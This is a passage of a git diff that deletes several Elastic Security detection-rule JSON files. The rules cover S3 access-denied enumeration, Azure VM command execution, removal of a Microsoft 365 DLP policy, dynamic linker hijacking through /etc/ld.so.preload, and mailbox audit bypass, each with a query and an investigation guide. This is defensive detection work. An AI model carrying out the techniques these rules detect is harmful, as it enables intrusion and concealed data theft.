that even private, locked down buckets can still trigger a potential cost, even with an \"Access Denied\", while also being accessible from unauthenticated, anonymous accounts. This also appears to work on several or all [operations](https://docs.aws.amazon.com/cli/latest/reference/s3api/) (GET, PUT, list-objects, etc.). Additionally, buckets are trivially discoverable by default as long as the bucket name is known, making it vulnerable to enumeration for discovery.\n\nAttackers may attempt to enumerate names until a valid bucket is discovered and then pivot to cause financial impact, enumerate for more information, or brute force in other ways to attempt to exfil data.\n\n#### Possible investigation steps\n\n- Examine the history of the operation requests from the same `source.address` and `cloud.account.id` to determine if there is other suspicious activity.\n- Review similar requests and look at the `user.agent` info to ascertain the source of the requests (though do not overly rely on this since it is controlled by the requestor).\n- Review other requests to the same `aws.s3.object.key` as well as other `aws.s3.object.key` accessed by the same `cloud.account.id` or `source.address`.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed when the error occurred.\n - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal time of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Verify the `source.address` and `cloud.account.id` - there are some valid operations from within AWS directly that can cause failures and false positives. Additionally, failed automation can also caeuse false positives, but should be identifiable by reviewing the `source.address` and `cloud.account.id`.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n- Check for PutBucketPolicy event actions as well to see if they have been tampered with. While we monitor for denied, a single successful action to add a backdoor into the bucket via policy updates (however they got permissions) may be critical to identify during TDIR.\n\n", - "query": "from logs-aws.cloudtrail*\n| where event.provider == \"s3.amazonaws.com\" and aws.cloudtrail.error_code == \"AccessDenied\"\n// keep only relevant fields\n| keep tls.client.server_name, source.address, cloud.account.id\n| stats failed_requests = count(*) by tls.client.server_name, source.address, cloud.account.id\n // can modify the failed request count or tweak time window to fit environment\n // can add `not cloud.account.id in (KNOWN)` or specify in exceptions\n| where failed_requests > 40\n", - "references": [ - "https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1", - "https://docs.aws.amazon.com/cli/latest/reference/s3api/" - ], - "risk_score": 21, - "rule_id": "5f0234fd-7f21-42af-8391-511d5fd11d5c", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS S3", - "Resources: Investigation Guide", - "Use Case: Log Auditing", - "Tactic: Impact" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1657", - "name": "Financial Theft", - "reference": "https://attack.mitre.org/techniques/T1657/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1580", - "name": "Cloud Infrastructure Discovery", - "reference": "https://attack.mitre.org/techniques/T1580/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 3 - }, - "id": "5f0234fd-7f21-42af-8391-511d5fd11d5c_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_103.json b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_103.json deleted file mode 100644 index 486d3682b55..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_103.json +++ /dev/null @@ -1,83 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they\u2019re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well.", - "false_positives": [ - "Command execution on a virtual machine may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Command execution from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Command Execution on Virtual Machine", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Command Execution on Virtual Machine\n\nAzure Virtual Machines (VMs) allow users to run applications and services in the cloud. While roles like Virtual Machine Contributor can manage VMs, they typically can't access them directly. However, commands can be executed remotely via PowerShell, running as System. Adversaries may exploit this to execute unauthorized commands. The detection rule monitors Azure activity logs for command execution events, flagging successful operations to identify potential misuse.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific user or service principal that initiated the command execution event, focusing on the operation_name \"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION\".\n- Check the event.outcome field to confirm the success of the command execution and gather details about the command executed.\n- Investigate the role and permissions of the user or service principal involved to determine if they have legitimate reasons to execute commands on the VM.\n- Analyze the context of the command execution, including the time and frequency of the events, to identify any unusual patterns or anomalies.\n- Correlate the command execution event with other logs or alerts from the same time period to identify any related suspicious activities or potential lateral movement.\n- If unauthorized access is suspected, review the VM's security settings and access controls to identify and mitigate any vulnerabilities or misconfigurations.\n\n### False positive analysis\n\n- Routine maintenance tasks executed by IT administrators can trigger the rule. To manage this, create exceptions for known maintenance scripts or scheduled tasks that are regularly executed.\n- Automated deployment processes that use PowerShell scripts to configure or update VMs may be flagged. Identify these processes and exclude them from the rule to prevent unnecessary alerts.\n- Security tools or monitoring solutions that perform regular checks on VMs might execute commands that are benign. Whitelist these tools by identifying their specific command patterns and excluding them from detection.\n- Development and testing environments often involve frequent command executions for testing purposes. Consider excluding these environments from the rule or setting up a separate monitoring policy with adjusted thresholds.\n- Ensure that any exclusion or exception is documented and reviewed periodically to maintain security posture and adapt to any changes in the environment or processes.\n\n### Response and remediation\n\n- Immediately isolate the affected virtual machine from the network to prevent further unauthorized command execution and potential lateral movement.\n- Review the Azure activity logs to identify the source of the command execution and determine if it was authorized or part of a larger attack pattern.\n- Revoke any unnecessary permissions from users or roles that have the ability to execute commands on virtual machines, focusing on those with Virtual Machine Contributor roles.\n- Conduct a thorough investigation of the executed commands to assess any changes or impacts on the system, and restore the VM to a known good state if necessary.\n- Implement additional monitoring and alerting for similar command execution activities, ensuring that any future unauthorized attempts are detected promptly.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems or data may have been compromised.\n- Review and update access control policies and role assignments to ensure that only necessary permissions are granted, reducing the risk of similar incidents in the future.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION\" and event.outcome:(Success or success)\n", - "references": [ - "https://adsecurity.org/?p=4277", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "60884af6-f553-4a6c-af13-300047455491", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Execution", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "60884af6-f553-4a6c-af13-300047455491_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_207.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_207.json deleted file mode 100644 index 5b3d52d8189..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring.", - "false_positives": [ - "A DLP policy may be removed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange DLP Policy Removed", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange DLP Policy Removed\n\nData Loss Prevention (DLP) in Microsoft 365 Exchange is crucial for safeguarding sensitive information by monitoring and controlling data transfers. Adversaries may exploit this by removing DLP policies to bypass data monitoring, facilitating unauthorized data exfiltration. The detection rule identifies such actions by analyzing audit logs for specific events indicating successful DLP policy removal, thus alerting security teams to potential defense evasion tactics.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Remove-DlpPolicy\" to identify the user account responsible for the action.\n- Check the event.outcome field to confirm the success of the DLP policy removal and gather additional context from related logs.\n- Investigate the user account's recent activities in Microsoft 365 to identify any other suspicious actions or anomalies.\n- Verify if the removed DLP policy was critical for protecting sensitive data and assess the potential impact of its removal.\n- Contact the user or their manager to confirm if the DLP policy removal was authorized and legitimate.\n- Examine any recent changes in permissions or roles for the user account to determine if they had the necessary privileges to remove the DLP policy.\n\n### False positive analysis\n\n- Routine administrative changes to DLP policies by authorized personnel can trigger alerts. To manage this, maintain a list of authorized users and correlate their activities with policy changes to verify legitimacy.\n- Scheduled updates or maintenance activities might involve temporary removal of DLP policies. Document these activities and create exceptions in the monitoring system for the duration of the maintenance window.\n- Automated scripts or third-party tools used for policy management can inadvertently trigger false positives. Ensure these tools are properly documented and their actions are logged to differentiate between legitimate and suspicious activities.\n- Changes in organizational policy or compliance requirements may necessitate the removal of certain DLP policies. Keep a record of such changes and adjust the monitoring rules to accommodate these legitimate actions.\n\n### Response and remediation\n\n- Immediately isolate the affected Microsoft 365 account to prevent further unauthorized actions and data exfiltration.\n- Review the audit logs to identify any additional unauthorized changes or suspicious activities associated with the account or related accounts.\n- Restore the removed DLP policy from a backup or recreate it based on the organization's standard configuration to re-enable data monitoring.\n- Conduct a thorough investigation to determine the scope of data exposure and identify any data that may have been exfiltrated during the period the DLP policy was inactive.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional containment measures are necessary.\n- Implement enhanced monitoring and alerting for similar events, focusing on unauthorized changes to security policies and configurations.\n- Review and strengthen access controls and permissions for accounts with the ability to modify DLP policies to prevent unauthorized changes in the future.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "60f3adec-1df9-4104-9c75-b97d9f078b25_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/640f79d1-571d-4f96-a9af-1194fc8cf763_4.json b/packages/security_detection_engine/kibana/security_rule/640f79d1-571d-4f96-a9af-1194fc8cf763_4.json deleted file mode 100644 index 3cc56a14d78..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/640f79d1-571d-4f96-a9af-1194fc8cf763_4.json +++ /dev/null @@ -1,129 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects the creation or modification of files related to the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Dynamic Linker Creation or Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Dynamic Linker Creation or Modification\n\nThe dynamic linker in Linux systems is crucial for loading shared libraries needed by programs at runtime. Adversaries may exploit this by altering linker configuration files to hijack program execution, enabling persistence or evasion. The detection rule identifies suspicious creation or renaming of these files, excluding benign processes and extensions, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the file path involved in the alert to determine if it matches any of the critical dynamic linker configuration files such as /etc/ld.so.preload, /etc/ld.so.conf.d/*, or /etc/ld.so.conf.\n- Identify the process that triggered the alert by examining the process.executable field and verify if it is listed as a benign process in the exclusion list. If not, investigate the legitimacy of the process.\n- Check the file extension and file.Ext.original.extension fields to ensure the file is not a temporary or expected system file, such as those with extensions like swp, swpx, swx, or dpkg-new.\n- Investigate the process.name field to determine if the process is a known system utility like java, sed, or perl, and assess if its usage in this context is typical or suspicious.\n- Gather additional context by reviewing recent system logs and other security alerts to identify any related or preceding suspicious activities that might indicate a broader attack or compromise.\n\n### False positive analysis\n\n- Package management operations can trigger false positives when legitimate package managers like dpkg, rpm, or yum modify linker configuration files. To handle this, ensure these processes are included in the exclusion list to prevent unnecessary alerts.\n- System updates or software installations often involve temporary file modifications with extensions like swp or dpkg-new. Exclude these extensions to reduce false positives.\n- Automated system management tools such as Puppet or Chef may modify linker files as part of their configuration management tasks. Add these tools to the exclusion list to avoid false alerts.\n- Virtualization and containerization platforms like Docker or VMware may alter linker configurations during normal operations. Verify these processes and exclude them if they are part of routine system behavior.\n- Custom scripts or applications that use common names like sed or perl might be flagged if they interact with linker files. Review these scripts and consider excluding them if they are verified as safe.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Review and restore the original dynamic linker configuration files from a known good backup to ensure the integrity of the system's execution flow.\n- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional malicious software or scripts.\n- Analyze system logs and the process execution history to identify the source of the unauthorized changes and determine if any other systems may be compromised.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the organization.\n- Implement additional monitoring on the affected system and similar systems to detect any future attempts to modify dynamic linker configuration files.\n- Review and update access controls and permissions to ensure that only authorized personnel have the ability to modify critical system files, reducing the risk of similar incidents in the future.", - "query": "file where host.os.type == \"linux\" and event.action in (\"creation\", \"rename\") and\nfile.path : (\"/etc/ld.so.preload\", \"/etc/ld.so.conf.d/*\", \"/etc/ld.so.conf\") and\nnot (\n process.executable in (\n \"/bin/dpkg\", \"/usr/bin/dpkg\", \"/bin/dockerd\", \"/usr/bin/dockerd\", \"/usr/sbin/dockerd\", \"/bin/microdnf\",\n \"/usr/bin/microdnf\", \"/bin/rpm\", \"/usr/bin/rpm\", \"/bin/snapd\", \"/usr/bin/snapd\", \"/bin/yum\", \"/usr/bin/yum\",\n \"/bin/dnf\", \"/usr/bin/dnf\", \"/bin/podman\", \"/usr/bin/podman\", \"/bin/dnf-automatic\", \"/usr/bin/dnf-automatic\",\n \"/bin/pacman\", \"/usr/bin/pacman\", \"/usr/bin/dpkg-divert\", \"/bin/dpkg-divert\", \"/sbin/apk\", \"/usr/sbin/apk\",\n \"/usr/local/sbin/apk\", \"/usr/bin/apt\", \"/usr/sbin/pacman\", \"/bin/podman\", \"/usr/bin/podman\", \"/usr/bin/puppet\",\n \"/bin/puppet\", \"/opt/puppetlabs/puppet/bin/puppet\", \"/usr/bin/chef-client\", \"/bin/chef-client\",\n \"/bin/autossl_check\", \"/usr/bin/autossl_check\", \"/proc/self/exe\", \"/dev/fd/*\", \"/usr/bin/pamac-daemon\",\n \"/bin/pamac-daemon\", \"/usr/lib/snapd/snapd\", \"/usr/local/bin/dockerd\", \"/usr/libexec/platform-python\",\n \"/usr/lib/snapd/snap-update-ns\", \"/usr/bin/vmware-config-tools.pl\"\n ) or\n file.extension in (\"swp\", \"swpx\", \"swx\", \"dpkg-remove\") or\n file.Ext.original.extension == \"dpkg-new\" or\n process.executable : (\n \"/nix/store/*\", \"/var/lib/dpkg/*\", \"/snap/*\", \"/dev/fd/*\", \"/usr/lib/virtualbox/*\", \"/opt/dynatrace/oneagent/*\"\n ) or\n process.executable == null or\n process.name in (\n \"java\", \"executor\", \"ssm-agent-worker\", \"packagekitd\", \"crio\", \"dockerd-entrypoint.sh\",\n \"docker-init\", \"BootTimeChecker\"\n ) or\n (process.name == \"sed\" and file.name : \"sed*\") or\n (process.name == \"perl\" and file.name : \"e2scrub_all.tmp*\")\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": false, - "name": "file.Ext.original.extension", - "type": "unknown" - }, - { - "ecs": true, - "name": "file.extension", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "640f79d1-571d-4f96-a9af-1194fc8cf763", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/", - "subtechnique": [ - { - "id": "T1574.006", - "name": "Dynamic Linker Hijacking", - "reference": "https://attack.mitre.org/techniques/T1574/006/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/", - "subtechnique": [ - { - "id": "T1574.006", - "name": "Dynamic Linker Hijacking", - "reference": "https://attack.mitre.org/techniques/T1574/006/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 - }, - "id": "640f79d1-571d-4f96-a9af-1194fc8cf763_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_207.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_207.json deleted file mode 100644 index 3239255a301..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_207.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account.", - "false_positives": [ - "Legitimate allowlisting of noisy accounts" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "O365 Mailbox Audit Logging Bypass", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating O365 Mailbox Audit Logging Bypass\n\nIn Microsoft 365 environments, mailbox audit logging is crucial for tracking user activities like accessing or deleting emails. However, administrators can exempt certain accounts from logging to reduce noise, which attackers might exploit to hide their actions. The detection rule identifies successful attempts to create such exemptions, signaling potential misuse of this bypass mechanism.\n\n### Possible investigation steps\n\n- Review the event logs for entries with event.dataset set to o365.audit and event.provider set to Exchange to confirm the presence of the Set-MailboxAuditBypassAssociation action.\n- Identify the account associated with the event.action Set-MailboxAuditBypassAssociation and verify if it is a known and authorized account for creating audit bypass associations.\n- Check the event.outcome field to ensure the action was successful and determine if there are any other related unsuccessful attempts that might indicate trial and error by an attacker.\n- Investigate the history of the account involved in the bypass association to identify any unusual or suspicious activities, such as recent changes in permissions or unexpected login locations.\n- Cross-reference the account with any known third-party tools or lawful monitoring accounts to determine if the bypass is legitimate or potentially malicious.\n- Assess the risk and impact of the bypass by evaluating the types of activities that would no longer be logged for the account in question, considering the organization's security policies and compliance requirements.\n\n### False positive analysis\n\n- Authorized third-party tools may generate a high volume of mailbox audit log entries, leading to bypass associations being set. Review and document these tools to ensure they are legitimate and necessary for business operations.\n- Accounts used for lawful monitoring might be exempted from logging to reduce noise. Verify that these accounts are properly documented and that their activities align with organizational policies.\n- Regularly review the list of accounts with bypass associations to ensure that only necessary and approved accounts are included. Remove any accounts that no longer require exemptions.\n- Implement a process for periodically auditing bypass associations to detect any unauthorized changes or additions, ensuring that only intended accounts are exempted from logging.\n- Consider setting up alerts for any new bypass associations to quickly identify and investigate potential misuse or unauthorized changes.\n\n### Response and remediation\n\n- Immediately isolate the account associated with the successful Set-MailboxAuditBypassAssociation event to prevent further unauthorized actions.\n- Review and revoke any unauthorized mailbox audit bypass associations to ensure all relevant activities are logged.\n- Conduct a thorough audit of recent activities performed by the affected account to identify any suspicious or malicious actions that may have been concealed.\n- Reset credentials for the compromised account and any other accounts that may have been affected to prevent further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring for similar bypass attempts to enhance detection capabilities and prevent recurrence.\n- Consider escalating the incident to a higher security tier or external cybersecurity experts if the scope of the breach is extensive or if internal resources are insufficient to handle the threat.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", - "references": [ - "https://twitter.com/misconfig/status/1476144066807140355" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_208.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_208.json deleted file mode 100644 index 9fb31a48b43..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_208.json +++ /dev/null @@ -1,98 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": 